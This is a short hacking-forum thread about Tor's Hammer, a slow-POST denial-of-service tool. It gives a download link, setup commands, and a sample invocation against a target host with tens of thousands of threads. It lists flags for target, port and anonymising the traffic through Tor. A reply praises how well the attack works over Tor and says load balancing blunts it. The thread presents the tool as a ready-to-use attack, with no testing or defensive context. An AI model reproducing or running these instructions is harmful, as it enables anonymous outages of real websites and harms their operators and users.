Tors Hammer

Started by ltdan, May 16, 2013, 12:45:07 AM

Previous topic - Next topic

ltdan

Here's a link to Tor's Hammer with download or you can grab it from the server:
http://www.hackingarticles.in/tors-hammer-slow-post-denial-of-service-testing-tool/
Extract the filez (tar xvf torshammer.tar) paste it wherever you want cd to the folder, to run:

chmod 755 torshammer.py

./torshammer.py

Some further notez from hackingarticles site:

./torshammer.py -t www.example.com -r 50000

the larger the thread count, the more efficient and effective the attack...

-t|–target <Hostname|IP>

-r|–threads <Number of threads> Defaults to 256

-p|–port <Web Server Port> Defaults to 80

-T|–tor Enable anonymising through tor on 127.0.0.1:9050



lt

fukwad

This is an awesome script. It works well with tor. The only downfall is, if the server is using load balancing it makes Tors Hammer useless. Easy enough to check for load balancing. Hackpack has a load balancing detector in the Recon menu.   :P